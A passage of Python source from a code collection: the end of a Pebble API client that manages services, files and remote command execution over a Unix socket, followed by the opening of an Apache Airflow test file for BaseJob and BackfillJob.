break
if encoding is not None:
chunk = chunk.decode(encoding)
writer.write(chunk)
class _WebsocketWriter(io.BufferedIOBase):
"""A writable file-like object that sends what's written to it to a websocket."""
def __init__(self, ws):
self.ws = ws
def writable(self):
"""Denote this file-like object as writable."""
return True
def write(self, chunk):
"""Write chunk to the websocket."""
if not isinstance(chunk, bytes):
raise TypeError('value to write must be bytes, not {}'.format(type(chunk).__name__))
self.ws.send_binary(chunk)
return len(chunk)
def close(self):
"""Send end-of-file message to websocket."""
self.ws.send('{"command":"end"}')
class _WebsocketReader(io.BufferedIOBase):
"""A readable file-like object whose reads come from a websocket."""
def __init__(self, ws):
self.ws = ws
self.remaining = b''
self.eof = False
def readable(self):
"""Denote this file-like object as readable."""
return True
def read(self, n=-1):
"""Read up to n bytes from the websocket (or one message if n<0)."""
if self.eof:
# Calling read() multiple times after EOF should still return EOF
return b''
while not self.remaining:
chunk = self.ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command, return EOF designator
self.eof = True
return b''
self.remaining = chunk
if n < 0:
n = len(self.remaining)
result = self.remaining[:n]
self.remaining = self.remaining[n:]
return result
def read1(self, n=-1):
"""An alias for read."""
return self.read(n)
class Client:
"""Pebble API client."""
_chunk_size = 8192
def __init__(self, socket_path=None, opener=None, base_url='http://localhost', timeout=5.0):
"""Initialize a client instance.
Defaults to using a Unix socket at socket_path (which must be specified
unless a custom opener is provided).
"""
if opener is None:
if socket_path is None:
raise ValueError('no socket path provided')
opener = self._get_default_opener(socket_path)
self.socket_path = socket_path
self.opener = opener
self.base_url = base_url
self.timeout = timeout
@classmethod
def _get_default_opener(cls, socket_path):
"""Build the default opener to use for requests (HTTP over Unix socket)."""
opener = urllib.request.OpenerDirector()
opener.add_handler(_UnixSocketHandler(socket_path))
opener.add_handler(urllib.request.HTTPDefaultErrorHandler())
opener.add_handler(urllib.request.HTTPRedirectHandler())
opener.add_handler(urllib.request.HTTPErrorProcessor())
return opener
def _request(
self, method: str, path: str, query: typing.Dict = None, body: typing.Dict = None,
) -> typing.Dict:
"""Make a JSON request to the Pebble server with the given HTTP method and path.
If query dict is provided, it is encoded and appended as a query string
to the URL. If body dict is provided, it is serialied as JSON and used
as the HTTP body (with Content-Type: "application/json"). The resulting
body is decoded from JSON.
"""
headers = {'Accept': 'application/json'}
data = None
if body is not None:
data = json.dumps(body).encode('utf-8')
headers['Content-Type'] = 'application/json'
response = self._request_raw(method, path, query, headers, data)
self._ensure_content_type(response.headers, 'application/json')
return _json_loads(response.read())
@staticmethod
def _ensure_content_type(headers, expected):
"""Parse Content-Type header from headers and ensure it's equal to expected.
Return a dict of any options in the header, e.g., {'boundary': ...}.
"""
ctype, options = cgi.parse_header(headers.get('Content-Type', ''))
if ctype != expected:
raise ProtocolError('expected Content-Type {!r}, got {!r}'.format(expected, ctype))
return options
def _request_raw(
self, method: str, path: str, query: typing.Dict = None, headers: typing.Dict = None,
data: bytes = None,
) -> http.client.HTTPResponse:
"""Make a request to the Pebble server; return the raw HTTPResponse object."""
url = self.base_url + path
if query:
url = url + '?' + urllib.parse.urlencode(query)
if headers is None:
headers = {}
request = urllib.request.Request(url, method=method, data=data, headers=headers)
try:
response = self.opener.open(request, timeout=self.timeout)
except urllib.error.HTTPError as e:
code = e.code
status = e.reason
try:
body = _json_loads(e.read())
message = body['result']['message']
except (IOError, ValueError, KeyError) as e2:
# Will only happen on read error or if Pebble sends invalid JSON.
body = {}
message = '{} - {}'.format(type(e2).__name__, e2)
raise APIError(body, code, status, message)
except urllib.error.URLError as e:
raise ConnectionError(e.reason)
return response
def get_system_info(self) -> SystemInfo:
"""Get system info."""
resp = self._request('GET', '/v1/system-info')
return SystemInfo.from_dict(resp['result'])
def get_warnings(self, select: WarningState = WarningState.PENDING) -> typing.List[Warning]:
"""Get list of warnings in given state (pending or all)."""
query = {'select': select.value}
resp = self._request('GET', '/v1/warnings', query)
return [Warning.from_dict(w) for w in resp['result']]
def ack_warnings(self, timestamp: datetime.datetime) -> int:
"""Acknowledge warnings up to given timestamp, return number acknowledged."""
body = {'action': 'okay', 'timestamp': timestamp.isoformat()}
resp = self._request('POST', '/v1/warnings', body=body)
return resp['result']
def get_changes(
self, select: ChangeState = ChangeState.IN_PROGRESS, service: str = None,
) -> typing.List[Change]:
"""Get list of changes in given state, filter by service name if given."""
query = {'select': select.value}
if service is not None:
query['for'] = service
resp = self._request('GET', '/v1/changes', query)
return [Change.from_dict(c) for c in resp['result']]
def get_change(self, change_id: ChangeID) -> Change:
"""Get single change by ID."""
resp = self._request('GET', '/v1/changes/{}'.format(change_id))
return Change.from_dict(resp['result'])
def abort_change(self, change_id: ChangeID) -> Change:
"""Abort change with given ID."""
body = {'action': 'abort'}
resp = self._request('POST', '/v1/changes/{}'.format(change_id), body=body)
return Change.from_dict(resp['result'])
def autostart_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
"""Start the startup-enabled services and wait (poll) for them to be started.
Args:
timeout: Seconds before autostart change is considered timed out (float).
delay: Seconds before executing the autostart change (float).
Returns:
ChangeID of the autostart change.
Raises:
ChangeError: if one or more of the services didn't start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('autostart', [], timeout, delay)
def replan_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
"""Replan by (re)starting changed and startup-enabled services and wait for them to start.
Args:
timeout: Seconds before replan change is considered timed out (float).
delay: Seconds before executing the replan change (float).
Returns:
ChangeID of the replan change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('replan', [], timeout, delay)
def start_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Start services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to start.
timeout: Seconds before start change is considered timed out (float).
delay: Seconds before executing the start change (float).
Returns:
ChangeID of the start change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('start', services, timeout, delay)
def stop_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Stop services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to stop.
timeout: Seconds before stop change is considered timed out (float).
delay: Seconds before executing the stop change (float).
Returns:
ChangeID of the stop change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('stop', services, timeout, delay)
def restart_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Restart services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to restart.
timeout: Seconds before restart change is considered timed out (float).
delay: Seconds before executing the restart change (float).
Returns:
ChangeID of the restart change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('restart', services, timeout, delay)
def _services_action(
self, action: str, services: typing.Iterable[str], timeout: float, delay: float,
) -> ChangeID:
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
body = {'action': action, 'services': services}
resp = self._request('POST', '/v1/services', body=body)
change_id = ChangeID(resp['change'])
if timeout:
change = self.wait_change(change_id, timeout=timeout, delay=delay)
if change.err:
raise ChangeError(change.err, change)
return change_id
def wait_change(
self, change_id: ChangeID, timeout: float = 30.0, delay: float = 0.1,
) -> Change:
"""Wait for the given change to be ready.
If the Pebble server supports the /v1/changes/{id}/wait API endpoint,
use that to avoid polling, otherwise poll /v1/changes/{id} every delay
seconds.
Args:
change_id: Change ID of change to wait for.
timeout: Maximum time in seconds to wait for the change to be
ready. May be None, in which case wait_change never times out.
delay: If polling, this is the delay in seconds between attempts.
Returns:
The Change object being waited on.
Raises:
TimeoutError: If the maximum timeout is reached.
"""
try:
return self._wait_change_using_wait(change_id, timeout)
except NotImplementedError:
# Pebble server doesn't support wait endpoint, fall back to polling
return self._wait_change_using_polling(change_id, timeout, delay)
def _wait_change_using_wait(self, change_id, timeout):
"""Wait for a change to be ready using the wait-change API."""
deadline = time.time() + timeout if timeout is not None else None
# Hit the wait endpoint every Client.timeout-1 seconds to avoid long
# requests (the -1 is to ensure it wakes up before the socket timeout)
while True:
this_timeout = max(self.timeout - 1, 1) # minimum of 1 second
if timeout is not None:
time_remaining = deadline - time.time()
if time_remaining <= 0:
break
# Wait the lesser of the time remaining and Client.timeout-1
this_timeout = min(time_remaining, this_timeout)
try:
return self._wait_change(change_id, this_timeout)
except TimeoutError:
# Catch timeout from wait endpoint and loop to check deadline
pass
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def _wait_change(self, change_id: ChangeID, timeout: float = None) -> Change:
"""Call the wait-change API endpoint directly."""
query = {}
if timeout is not None:
query['timeout'] = _format_timeout(timeout)
try:
resp = self._request('GET', '/v1/changes/{}/wait'.format(change_id), query)
except APIError as e:
if e.code == 404:
raise NotImplementedError('server does not implement wait-change endpoint')
if e.code == 504:
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
raise
return Change.from_dict(resp['result'])
def _wait_change_using_polling(self, change_id, timeout, delay):
"""Wait for a change to be ready by polling the get-change API."""
deadline = time.time() + timeout if timeout is not None else None
while timeout is None or time.time() < deadline:
change = self.get_change(change_id)
if change.ready:
return change
time.sleep(delay)
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def add_layer(
self, label: str, layer: typing.Union[str, dict, Layer], *, combine: bool = False):
"""Dynamically add a new layer onto the Pebble configuration layers.
If combine is False (the default), append the new layer as the top
layer with the given label. If combine is True and the label already
exists, the two layers are combined into a single one considering the
layer override rules; if the layer doesn't exist, it is added as usual.
"""
if not isinstance(label, str):
raise TypeError('label must be a str, not {}'.format(type(label).__name__))
if isinstance(layer, str):
layer_yaml = layer
elif isinstance(layer, dict):
layer_yaml = Layer(layer).to_yaml()
elif isinstance(layer, Layer):
layer_yaml = layer.to_yaml()
else:
raise TypeError('layer must be str, dict, or pebble.Layer, not {}'.format(
type(layer).__name__))
body = {
'action': 'add',
'combine': combine,
'label': label,
'format': 'yaml',
'layer': layer_yaml,
}
self._request('POST', '/v1/layers', body=body)
def get_plan(self) -> Plan:
"""Get the Pebble plan (currently contains only combined services)."""
resp = self._request('GET', '/v1/plan', {'format': 'yaml'})
return Plan(resp['result'])
def get_services(self, names: typing.List[str] = None) -> typing.List[ServiceInfo]:
"""Get the service status for the configured services.
If names is specified, only fetch the service status for the services
named.
"""
query = None
if names is not None:
query = {'names': ','.join(names)}
resp = self._request('GET', '/v1/services', query)
return [ServiceInfo.from_dict(info) for info in resp['result']]
def pull(self, path: str, *, encoding: str = 'utf-8') -> typing.Union[typing.BinaryIO,
typing.TextIO]:
"""Read a file's content from the remote system.
Args:
path: Path of the file to read from the remote system.
encoding: Encoding to use for decoding the file's bytes to str,
or None to specify no decoding.
Returns:
A readable file-like object, whose read() method will return str
objects decoded according to the specified encoding, or bytes if
encoding is None.
"""
query = {
'action': 'read',
'path': path,
}
headers = {'Accept': 'multipart/form-data'}
response = self._request_raw('GET', '/v1/files', query, headers)
options = self._ensure_content_type(response.headers, 'multipart/form-data')
boundary = options.get('boundary', '')
if not boundary:
raise ProtocolError('invalid boundary {!r}'.format(boundary))
# We have to manually write the Content-Type with boundary, because
# email.parser expects the entire multipart message with headers.
parser = email.parser.BytesFeedParser()
parser.feed(b'Content-Type: multipart/form-data; boundary='
+ boundary.encode('utf-8') + b'\r\n\r\n')
# Then read the rest of the response and feed it to the parser.
while True:
chunk = response.read(self._chunk_size)
if not chunk:
break
parser.feed(chunk)
message = parser.close()
# Walk over the multipart parts and read content and metadata.
resp = None
content = None
for part in message.walk():
name = part.get_param('name', header='Content-Disposition')
if name == 'response':
resp = _json_loads(part.get_payload())
elif name == 'files':
filename = part.get_filename()
if filename != path:
raise ProtocolError('path not expected: {}'.format(filename))
# decode=True, ironically, avoids decoding bytes to str
content = part.get_payload(decode=True)
if resp is None:
raise ProtocolError('no "response" field in multipart body')
self._raise_on_path_error(resp, path)
if content is None:
raise ProtocolError('no file content in multipart response')
if encoding is not None:
reader = io.StringIO(content.decode(encoding))
else:
reader = io.BytesIO(content)
return reader
@staticmethod
def _raise_on_path_error(resp, path):
result = resp['result'] or [] # in case it's null instead of []
paths = {item['path']: item for item in result}
if path not in paths:
raise ProtocolError('path not found in response metadata: {}'.format(resp))
error = paths[path].get('error')
if error:
raise PathError(error['kind'], error['message'])
def push(
self, path: str, source: typing.Union[bytes, str, typing.BinaryIO, typing.TextIO], *,
encoding: str = 'utf-8', make_dirs: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Write content to a given file path on the remote system.
Args:
path: Path of the file to write to on the remote system.
source: Source of data to write. This is either a concrete str or
bytes instance, or a readable file-like object.
encoding: Encoding to use for encoding source str to bytes, or
strings read from source if it is a TextIO type. Ignored if
source is bytes or BinaryIO.
make_dirs: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create file with (Pebble default
is 0o644).
user_id: User ID (UID) for file.
user: Username for file. User's UID must match user_id if both are
specified.
group_id: Group ID (GID) for file.
group: Group name for file. Group's GID must match group_id if
both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_dirs:
info['make-dirs'] = True
metadata = {
'action': 'write',
'files': [info],
}
data, content_type = self._encode_multipart(metadata, path, source, encoding)
headers = {
'Accept': 'application/json',
'Content-Type': content_type,
}
response = self._request_raw('POST', '/v1/files', None, headers, data)
self._ensure_content_type(response.headers, 'application/json')
resp = _json_loads(response.read())
self._raise_on_path_error(resp, path)
@staticmethod
def _make_auth_dict(permissions, user_id, user, group_id, group) -> typing.Dict:
d = {}
if permissions is not None:
d['permissions'] = format(permissions, '03o')
if user_id is not None:
d['user-id'] = user_id
if user is not None:
d['user'] = user
if group_id is not None:
d['group-id'] = group_id
if group is not None:
d['group'] = group
return d
def _encode_multipart(self, metadata, path, source, encoding):
# Python's stdlib mime/multipart handling is screwy and doesn't handle
# binary properly, so roll our own.
if isinstance(source, str):
source = io.StringIO(source)
elif isinstance(source, bytes):
source = io.BytesIO(source)
boundary = binascii.hexlify(os.urandom(16))
path_escaped = path.replace('"', '\\"').encode('utf-8') # NOQA: test_quote_backslashes
content_type = 'multipart/form-data; boundary="' + boundary.decode('utf-8') + '"'
def generator():
yield b''.join([
b'--', boundary, b'\r\n',
b'Content-Type: application/json\r\n',
b'Content-Disposition: form-data; name="request"\r\n',
b'\r\n',
json.dumps(metadata).encode('utf-8'), b'\r\n',
b'--', boundary, b'\r\n',
b'Content-Type: application/octet-stream\r\n',
b'Content-Disposition: form-data; name="files"; filename="',
path_escaped, b'"\r\n',
b'\r\n',
])
content = source.read(self._chunk_size)
while content:
if isinstance(content, str):
content = content.encode(encoding)
yield content
content = source.read(self._chunk_size)
yield b''.join([
b'\r\n',
b'--', boundary, b'--\r\n',
])
return generator(), content_type
def list_files(self, path: str, *, pattern: str = None,
itself: bool = False) -> typing.List[FileInfo]:
"""Return list of directory entries from given path on remote system.
Despite the name, this method returns a list of files *and*
directories, similar to :func:`os.listdir` or :func:`os.scandir`.
Args:
path: Path of the directory to list, or path of the file to return
information about.
pattern: If specified, filter the list to just the files that match,
for example ``*.txt``.
itself: If path refers to a directory, return information about the
directory itself, rather than its contents.
"""
query = {
'action': 'list',
'path': path,
}
if pattern:
query['pattern'] = pattern
if itself:
query['itself'] = 'true'
resp = self._request('GET', '/v1/files', query)
result = resp['result'] or [] # in case it's null instead of []
return [FileInfo.from_dict(d) for d in result]
def make_dir(
self, path: str, *, make_parents: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Create a directory on the remote system with the given attributes.
Args:
path: Path of the directory to create on the remote system.
make_parents: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create directory with (Pebble
default is 0o755).
user_id: User ID (UID) for directory.
user: Username for directory. User's UID must match user_id if
both are specified.
group_id: Group ID (GID) for directory.
group: Group name for directory. Group's GID must match group_id
if both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_parents:
info['make-parents'] = True
body = {
'action': 'make-dirs',
'dirs': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def remove_path(self, path: str, *, recursive: bool = False):
"""Remove a file or directory on the remote system.
Args:
path: Path of the file or directory to delete from the remote system.
recursive: If True, recursively delete path and everything under it.
"""
info = {'path': path}
if recursive:
info['recursive'] = True
body = {
'action': 'remove',
'paths': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def exec(
self,
command: typing.List[str],
*,
environment: typing.Dict[str, str] = None,
working_dir: str = None,
timeout: float = None,
user_id: int = None,
user: str = None,
group_id: int = None,
group: str = None,
stdin: typing.Union[str, bytes, typing.TextIO, typing.BinaryIO] = None,
stdout: typing.Union[typing.TextIO, typing.BinaryIO] = None,
stderr: typing.Union[typing.TextIO, typing.BinaryIO] = None,
encoding: str = 'utf-8',
combine_stderr: bool = False
) -> ExecProcess:
r"""Execute the given command on the remote system.
Most of the parameters are explained in the "Parameters" section
below, however, input/output handling is a bit more complex. Some
examples are shown below::
# Simple command with no output; just check exit code
>>> process = client.exec(['send-emails'])
>>> process.wait()
# Fetch output as string
>>> process = client.exec(['python3', '--version'])
>>> version, _ = process.wait_output()
>>> print(version)
Python 3.8.10
# Fetch both stdout and stderr as strings
>>> process = client.exec(['pg_dump', '-s', ...])
>>> schema, logs = process.wait_output()
# Stream input from a string and write output to files
>>> stdin = 'foo\nbar\n'
>>> with open('out.txt', 'w') as out, open('err.txt', 'w') as err:
... process = client.exec(['awk', '{ print toupper($0) }'],
... stdin=stdin, stdout=out, stderr=err)
... process.wait()
>>> open('out.txt').read()
'FOO\nBAR\n'
>>> open('err.txt').read()
''
# Real-time streaming using ExecProcess.stdin and ExecProcess.stdout
>>> process = client.exec(['cat'])
>>> def stdin_thread():
... for line in ['one\n', '2\n', 'THREE\n']:
... process.stdin.write(line)
... process.stdin.flush()
... time.sleep(1)
... process.stdin.close()
...
>>> threading.Thread(target=stdin_thread).start()
>>> for line in process.stdout:
... print(datetime.datetime.now().strftime('%H:%M:%S'), repr(line))
...
16:20:26 'one\n'
16:20:27 '2\n'
16:20:28 'THREE\n'
>>> process.wait() # will return immediately as stdin was closed
# Show exception raised for non-zero return code
>>> process = client.exec(['ls', 'notexist'])
>>> out, err = process.wait_output()
Traceback (most recent call last):
...
ExecError: "ls" returned exit code 2
>>> exc = sys.last_value
>>> exc.exit_code
2
>>> exc.stdout
''
>>> exc.stderr
"ls: cannot access 'notfound': No such file or directory\n"
Args:
command: Command to execute: the first item is the name (or path)
of the executable, the rest of the items are the arguments.
environment: Environment variables to pass to the process.
working_dir: Working directory to run the command in. If not set,
Pebble uses the target user's $HOME directory (and if the user
argument is not set, $HOME of the user Pebble is running as).
timeout: Timeout in seconds for the command execution, after which
the process will be terminated. If not specified, the
execution never times out.
user_id: User ID (UID) to run the process as.
user: Username to run the process as. User's UID must match
user_id if both are specified.
group_id: Group ID (GID) to run the process as.
group: Group name to run the process as. Group's GID must match
group_id if both are specified.
stdin: A string or readable file-like object that is sent to the
process's standard input. If not set, the caller can write
input to :attr:`ExecProcess.stdin` to stream input to the
process.
stdout: A writable file-like object that the process's standard
output is written to. If not set, the caller can use
:meth:`ExecProcess.wait_output` to capture output as a string,
or read from :meth:`ExecProcess.stdout` to stream output from
the process.
stderr: A writable file-like object that the process's standard
error is written to. If not set, the caller can use
:meth:`ExecProcess.wait_output` to capture error output as a
string, or read from :meth:`ExecProcess.stderr` to stream
error output from the process. Must be None if combine_stderr
is True.
encoding: If encoding is set (the default is UTF-8), the types
read or written to stdin/stdout/stderr are str, and encoding
is used to encode them to bytes. If encoding is None, the
types read or written are raw bytes.
combine_stderr: If True, process's stderr output is combined into
its stdout (the stderr argument must be None). If False,
separate streams are used for stdout and stderr.
Returns:
A Process object representing the state of the running process.
To wait for the command to finish, the caller will typically call
:meth:`ExecProcess.wait` if stdout/stderr were provided as
arguments to :meth:`exec`, or :meth:`ExecProcess.wait_output` if
not.
"""
if not isinstance(command, list) or not all(isinstance(s, str) for s in command):
raise TypeError('command must be a list of str, not {}'.format(
type(command).__name__))
if len(command) < 1:
raise ValueError('command must contain at least one item')
if stdin is not None:
if isinstance(stdin, str):
if encoding is None:
raise ValueError('encoding must be set if stdin is str')
stdin = io.BytesIO(stdin.encode(encoding))
elif isinstance(stdin, bytes):
if encoding is not None:
raise ValueError('encoding must be None if stdin is bytes')
stdin = io.BytesIO(stdin)
elif not hasattr(stdin, 'read'):
raise TypeError('stdin must be str, bytes, or a readable file-like object')
if combine_stderr and stderr is not None:
raise ValueError('stderr must be None if combine_stderr is True')
body = {
'command': command,
'environment': environment or {},
'working-dir': working_dir,
'timeout': _format_timeout(timeout) if timeout is not None else None,
'user-id': user_id,
'user': user,
'group-id': group_id,
'group': group,
'split-stderr': not combine_stderr,
}
resp = self._request('POST', '/v1/exec', body=body)
change_id = resp['change']
task_id = resp['result']['task-id']
stderr_ws = None
try:
control_ws = self._connect_websocket(task_id, 'control')
stdio_ws = self._connect_websocket(task_id, 'stdio')
if not combine_stderr:
stderr_ws = self._connect_websocket(task_id, 'stderr')
except websocket.WebSocketException as e:
# Error connecting to websockets, probably due to the exec/change
# finishing early with an error. Call wait_change to pick that up.
change = self.wait_change(ChangeID(change_id))
if change.err:
raise ChangeError(change.err, change)
raise ConnectionError('unexpected error connecting to websockets: {}'.format(e))
cancel_stdin = None
cancel_reader = None
threads = []
if stdin is not None:
if _has_fileno(stdin):
if sys.platform == 'win32':
raise NotImplementedError('file-based stdin not supported on Windows')
# Create a pipe so _reader_to_websocket can select() on the
# reader as well as this cancel_reader; when we write anything
# to cancel_writer it'll trigger the select and end the thread.
cancel_reader, cancel_writer = os.pipe()
def cancel_stdin():
os.write(cancel_writer, b'x') # doesn't matter what we write
os.close(cancel_writer)
t = _start_thread(_reader_to_websocket, stdin, stdio_ws, encoding, cancel_reader)
threads.append(t)
process_stdin = None
else:
process_stdin = _WebsocketWriter(stdio_ws)
if encoding is not None:
process_stdin = io.TextIOWrapper(process_stdin, encoding=encoding, newline='')
if stdout is not None:
t = _start_thread(_websocket_to_writer, stdio_ws, stdout, encoding)
threads.append(t)
process_stdout = None
else:
process_stdout = _WebsocketReader(stdio_ws)
if encoding is not None:
process_stdout = io.TextIOWrapper(process_stdout, encoding=encoding, newline='')
process_stderr = None
if not combine_stderr:
if stderr is not None:
t = _start_thread(_websocket_to_writer, stderr_ws, stderr, encoding)
threads.append(t)
else:
process_stderr = _WebsocketReader(stderr_ws)
if encoding is not None:
process_stderr = io.TextIOWrapper(
process_stderr, encoding=encoding, newline='')
process = ExecProcess(
stdin=process_stdin,
stdout=process_stdout,
stderr=process_stderr,
client=self,
timeout=timeout,
stdio_ws=stdio_ws,
stderr_ws=stderr_ws,
control_ws=control_ws,
command=command,
encoding=encoding,
change_id=ChangeID(change_id),
cancel_stdin=cancel_stdin,
cancel_reader=cancel_reader,
threads=threads,
)
return process
def _connect_websocket(self, task_id: str, websocket_id: str) -> websocket.WebSocket:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socket_path)
url = self._websocket_url(task_id, websocket_id)
ws = websocket.WebSocket(skip_utf8_validation=True)
ws.connect(url, socket=sock)
return ws
def _websocket_url(self, task_id: str, websocket_id: str) -> str:
base_url = self.base_url.replace('http://', 'ws://')
url = '{}/v1/tasks/{}/websocket/{}'.format(base_url, task_id, websocket_id)
return url
def send_signal(self, sig: typing.Union[int, str], services: typing.List[str]):
"""Send the given signal to the list of services named.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
services: Non-empty list of service names to send the signal to.
Raises:
APIError: If any of the services are not in the plan or are not
currently running.
"""
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
if isinstance(sig, int):
sig = signal.Signals(sig).name
body = {
'signal': sig,
'services': services,
}
self._request('POST', '/v1/signals', body=body)
|
jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import six
import threading
import time
import unittest
from tempfile import mkdtemp
import sqlalchemy
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.net import get_hostname
from mock import Mock, patch, MagicMock, PropertyMock
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEquals(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
"""
# some DAGs really are just examples... but try to make them work!
skip_dags = [
'example_http_operator',
'example_twitter_dag',
'example_trigger_target_dag',
'example_trigger_controller_dag', # tested above
'test_utils', # sleeps forever
